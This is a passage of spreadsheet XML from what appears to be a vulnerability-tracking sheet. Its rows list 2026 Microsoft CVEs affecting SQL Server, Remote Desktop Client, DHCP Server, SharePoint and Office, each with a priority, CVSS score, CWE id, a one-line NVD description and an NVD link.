      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67373</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67380</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67380</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67381</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67381</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67384</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67384</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67385</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>Use after free in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67385</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67388</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67388</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67638</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67638</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67639</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K128" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67639</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67642</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67642</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68775</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K130" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68775</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68786</t>
        </is>
      </c>
      <c r="D131" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E131" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F131" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K131" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L131" s="5" t="inlineStr"/>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68786</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68828</t>
        </is>
      </c>
      <c r="D132" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E132" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F132" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr"/>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68828</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69266</t>
        </is>
      </c>
      <c r="D133" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E133" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F133" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K133" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L133" s="5" t="inlineStr"/>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69266</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69268</t>
        </is>
      </c>
      <c r="D134" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E134" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F134" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K134" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L134" s="5" t="inlineStr"/>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69268</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69273</t>
        </is>
      </c>
      <c r="D135" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E135" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F135" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K135" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L135" s="5" t="inlineStr"/>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69273</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69282</t>
        </is>
      </c>
      <c r="D136" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E136" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F136" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K136" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69282</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69285</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S137" s="5" t="inlineStr">
        <is>
